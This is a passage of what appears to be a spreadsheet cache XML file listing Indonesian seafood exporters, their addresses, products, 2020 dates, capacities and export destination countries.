    <s v="Desa Raja, Kel. Raja, Kec. Bendahara, Kabupaten Aceh Tamiang&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Pelagis Beku (Layur, Bandeng, Cakalang)"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="20215"/>
    <x v="12"/>
    <s v="CV. KING OF MILK FISH"/>
    <s v="Desa Raja, Kel. Raja, Kec. Bendahara, Kabupaten Aceh Tamiang&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Lobster Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="1200"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="20216"/>
    <x v="12"/>
    <s v="CV. KING OF MILK FISH"/>
    <s v="Desa Raja, Kel. Raja, Kec. Bendahara, Kabupaten Aceh Tamiang&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Lobster Segar"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="20217"/>
    <x v="12"/>
    <s v="CV. KING OF MILK FISH"/>
    <s v="Desa Raja, Kel. Raja, Kec. Bendahara, Kabupaten Aceh Tamiang&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Rajungan Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="20218"/>
    <x v="12"/>
    <s v="CV. KING OF MILK FISH"/>
    <s v="Desa Raja, Kel. Raja, Kec. Bendahara, Kabupaten Aceh Tamiang&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Rajungan Segar"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="24000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="19958"/>
    <x v="13"/>
    <s v="PT. SAMUDERA INDO SEJAHTERA"/>
    <s v="Jl. Dullah Raya Km 8, Kel. Ngadi, Kec. Pulau Dullah Utara, Kota Tual&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Beku (Teri, Baby Tuna, Tongkol, Kuwe, Kembung, Marlin, Talang-talang, Muroaji, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-06-04T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Pakistan, Singapore, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19959"/>
    <x v="13"/>
    <s v="PT. SAMUDERA INDO SEJAHTERA"/>
    <s v="Jl. Dullah Raya Km 8, Kel. Ngadi, Kec. Pulau Dullah Utara, Kota Tual&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Lencam, Sebelah, Pisang-pisang, Manyung, Biji Nangka, Kuniran, Kerapu, Layur, Beloso, Belanak, Bawal, Kakap, Kuro, Ekor Kuning)"/>
    <d v="2020-06-04T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Pakistan, Singapore, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19960"/>
    <x v="13"/>
    <s v="PT. SAMUDERA INDO SEJAHTERA"/>
    <s v="Jl. Dullah Raya Km 8, Kel. Ngadi, Kec. Pulau Dullah Utara, Kota Tual&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-06-04T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Pakistan, Singapore, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="18353"/>
    <x v="9"/>
    <s v="PT, REPUBLIK LAUTAN JAYA"/>
    <s v="Muara Angke PHPT Pengasinan Blok A No,6 RT 001 RW 006, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Perut Ikan Kering"/>
    <d v="2020-07-13T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Utara, Kota Semarang, Kota Surabaya"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21107"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Teripang Segar"/>
    <d v="2020-06-30T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="21300"/>
    <x v="14"/>
    <s v="PT. CAKRAWALA SAMUDERA MANDIRI"/>
    <s v="Kompleks PPN Ambon, Jl. Sultan Hasanudin RT 03 RW 011, Kel. Batu Merah, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Depok, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan, Kota Denpasar, Kota Makassar"/>
    <s v="Australia, China, France, Hong Kong, Italy, Japan, Oman, Saudi Arabia, Singapore, Thailand, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20814"/>
    <x v="6"/>
    <s v="PT. INDONA SAMUDRA PASIFIK INDONESIA"/>
    <s v="Jl. Sanrangan No.14, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Layang, Cakalang, Tenggiri, Pedang)"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Palembang, Kota Batam, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar"/>
    <s v="Australia, Brunei Darussalam, China, Hong Kong, Japan, Malaysia, Singapore, Thailand, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20758"/>
    <x v="15"/>
    <s v="UD, HALIM JAYA"/>
    <s v="Jl, Raya Deli Tua - Patumbak Km 18,5, Jl, Lantasan Baru No,1, Kel, Cinta Damai, Kec, Patumbak, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Lobster Hidup"/>
    <d v="2020-06-10T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20759"/>
    <x v="15"/>
    <s v="UD. HALIM JAYA"/>
    <s v="Jl. Raya Deli Tua - Patumbak Km 18.5, Jl. Lantasan Baru No.1, Kel. Cinta Damai, Kec. Patumbak, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Siput Hidup"/>
    <d v="2020-06-10T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20109"/>
    <x v="7"/>
    <s v="PT. SINAR SEJAHTERA SENTOSA"/>
    <s v="Jl. Muara Baru Ujung Blok E No.2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Malong, Gulama, Lencam, Sebelah, Senangin, Kerapu, Layur, Kakatua, Bawal, Kakap, Ayam-ayam, Kaci-kaci, Barramundi)"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Australia, Belgium, China, France, Germany, Mauritius, Saudi Arabia, Taiwan, Province of China, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="19374"/>
    <x v="15"/>
    <s v="UD, HALIM JAYA"/>
    <s v="Jl, Raya Deli Tua - Patumbak Km 18,5, Jl, Lantasan Baru No,1, Kel, Cinta Damai, Kec, Patumbak, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-03-16T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19375"/>
    <x v="15"/>
    <s v="UD, HALIM JAYA"/>
    <s v="Jl, Raya Deli Tua - Patumbak Km 18,5, Jl, Lantasan Baru No,1, Kel, Cinta Damai, Kec, Patumbak, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Lobster Air Tawar Hidup"/>
    <d v="2020-03-16T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19993"/>
    <x v="15"/>
    <s v="UD. HALIM JAYA"/>
    <s v="Jl. Raya Deli Tua - Patumbak Km 18.5, Jl. Lantasan Baru No.1, Kel. Cinta Damai, Kec. Patumbak, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Sidat Hidup"/>
    <d v="2020-03-16T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20021"/>
    <x v="16"/>
    <s v="PT. LAURA INDO"/>
    <s v="Jl. Sabar Jaya No.59, Kel. Perajen, Kec. Banyuasin I, Kabupaten Banyuasin&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-02-28T00:00:00"/>
    <n v="450000"/>
    <m/>
    <s v="Australia, China, France, Hong Kong, Japan, Malaysia, Singapore, Spain, Thailand, United Kingdom, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20538"/>
    <x v="17"/>
    <s v="PT. BINTANG MEGAH JAYA PERKASA"/>
    <s v="Jl. Batangase No.50, Kel. Batangase, Kec. Bontoa, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Segar"/>
    <d v="2020-03-31T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates"/>
  </r>
  <r>
    <n v="20539"/>
    <x v="17"/>
    <s v="PT. BINTANG MEGAH JAYA PERKASA"/>
    <s v="Jl. Batangase No.50, Kel. Batangase, Kec. Bontoa, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Katamba, Sebelah, Kerapu, Layur, Kakatua, Bawal, Kakap, Barramundi)"/>
    <d v="2020-03-31T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates"/>
  </r>
  <r>
    <n v="21243"/>
    <x v="18"/>
    <s v="CV. HOKKY MAKMUR"/>
    <s v="Pergudangan Eastroad Blok F No.18, Kel. Bajarsari, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Teri, Lemuru, Kembung, Talang-talang, Layang, Tenggiri)"/>
    <d v="2020-07-29T00:00:00"/>
    <n v="800000"/>
    <s v="Kota Jakarta Utara, Kabupaten Probolinggo, Kabupaten Sidoarjo, Kota Pasuruan, Kota Surabaya"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="21244"/>
    <x v="18"/>
    <s v="CV. HOKKY MAKMUR"/>
    <s v="Pergudangan Eastroad Blok F No.18, Kel. Bajarsari, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Lencam, Kerapu, Layur, Beloso, Kakatua, Kakap, Kuro, Kurisi)"/>
    <d v="2020-07-29T00:00:00"/>
    <n v="800000"/>
    <s v="Kota Jakarta Utara, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kota Surabaya"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="20734"/>
    <x v="19"/>
    <s v="PT. SEAFOOD SUMATERA PERKASA"/>
    <s v="Jl. Titi Pahlawan No.38, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-08T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Australia, Canada, France, Italy, Korea, Democratic People's Republic of, Malaysia, Singapore, Spain, Turkey, Viet Nam"/>
  </r>
  <r>
    <n v="20800"/>
    <x v="20"/>
    <s v="PT. KELOLA MINA SAMUDRA"/>
    <s v="Komplek PPN Ternate, Jl. Pasar Inpres Bastiong No.97, Kel. Bastiong Talangame, Kec. Ternate Selatan, Kota Ternate&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-04-29T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Jakarta Pusat, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar, Kota Manado, Kota Makassar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Saudi Arabia, United Kingdom, United States"/>
  </r>
  <r>
    <n v="20887"/>
    <x v="21"/>
    <s v="PT. KARYA AGUNG LESTARI JAYA"/>
    <s v="Jl. Gabion Perikanan Nusantara No.4, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Beku"/>
    <d v="2020-08-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20888"/>
    <x v="21"/>
    <s v="PT. KARYA AGUNG LESTARI JAYA"/>
    <s v="Jl. Gabion Perikanan Nusantara No.4, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Tuna Beku"/>
    <d v="2020-08-12T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20488"/>
    <x v="22"/>
    <s v="CV. JALADRI INDONESIA"/>
    <s v="Jl. Kawasan Wisata Tanjung Bayang RT 04 RW 05, Kel. Tanjung Medeka, Kec. Tamalate, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kuwe, Tenggiri)"/>
    <d v="2020-04-30T00:00:00"/>
    <n v="84000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19386"/>
    <x v="23"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Ikan Tuna Raya, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Amberjack, Lemuru, Mata Besar, Deho, Escolar, Lemadang, Marlin, Semar, Sarden, Cakalang, Tenggiri, Todak)"/>
    <d v="2020-03-19T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Australia, Canada, Japan, Korea, Democratic People's Republic of, Netherlands, United Arab Emirates, United States"/>
  </r>
  <r>
    <n v="20104"/>
    <x v="7"/>
    <s v="PT. SINAR SEJAHTERA SENTOSA"/>
    <s v="Jl. Muara Baru Ujung Blok E No.2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="Australia, Belgium, France, Germany, Greece, Italy, Mauritius, United Arab Emirates, United Kingdom, United States"/>
  </r>
  <r>
    <n v="19686"/>
    <x v="24"/>
    <s v="PT. GABUNGAN SAMUDERA INTERNASIONAL"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.05 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kabupaten Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19688"/>
    <x v="24"/>
    <s v="PT, GABUNGAN SAMUDERA INTERNASIONAL"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl, Pendaratan Ikan No,05 RT 005 RW 003, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Sembilang, Emperor, Kerapu, Layur, Beloso, Bawal, Kakap, Baronang, Ekor Kuning)"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kota Bandung, Kabupaten Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19739"/>
    <x v="25"/>
    <s v="PT, CAHAYA BAHARI JAKARTA"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl, Pendaratan Ikan No,04 RT 005 RW 003, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kabupaten Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19741"/>
    <x v="25"/>
    <s v="PT. CAHAYA BAHARI JAKARTA"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.04 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Malong, Sembilang, Emperor, Kerapu, Layur, Beloso, Bawal, Kakap, Baronang, Ekor Kuning)"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kabupaten Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19743"/>
    <x v="25"/>
    <s v="PT. CAHAYA BAHARI JAKARTA"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.04 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="27000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kota Bandung, Kabupaten Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19684"/>
    <x v="24"/>
    <s v="PT. GABUNGAN SAMUDERA INTERNASIONAL"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.05 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Sirip Hiu Beku"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="27000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19685"/>
    <x v="24"/>
    <s v="PT. GABUNGAN SAMUDERA INTERNASIONAL"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.05 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="27000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19687"/>
    <x v="24"/>
    <s v="PT. GABUNGAN SAMUDERA INTERNASIONAL"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.05 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Lemuru, Tongkol, Kembung, Lemadang, Marlin, Salem, Muroaji, Layang, Cakalang, Tenggiri, Todak)"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19689"/>
    <x v="24"/>
    <s v="PT. GABUNGAN SAMUDERA INTERNASIONAL"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.05 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19691"/>
    <x v="24"/>
    <s v="PT. GABUNGAN SAMUDERA INTERNASIONAL"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.05 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="27000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19692"/>
    <x v="24"/>
    <s v="PT. GABUNGAN SAMUDERA INTERNASIONAL"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.05 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="27000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19742"/>
    <x v="25"/>
    <s v="PT. CAHAYA BAHARI JAKARTA"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.04 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19747"/>
    <x v="25"/>
    <s v="PT. CAHAYA BAHARI JAKARTA"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.04 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="27000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19748"/>
    <x v="25"/>
    <s v="PT. CAHAYA BAHARI JAKARTA"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.04 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="27000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19690"/>
    <x v="24"/>
    <s v="PT. GABUNGAN SAMUDERA INTERNASIONAL"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.05 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="27000"/>
    <s v="Kota Medan, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19746"/>
    <x v="25"/>
    <s v="PT. CAHAYA BAHARI JAKARTA"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.04 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="100000"/>
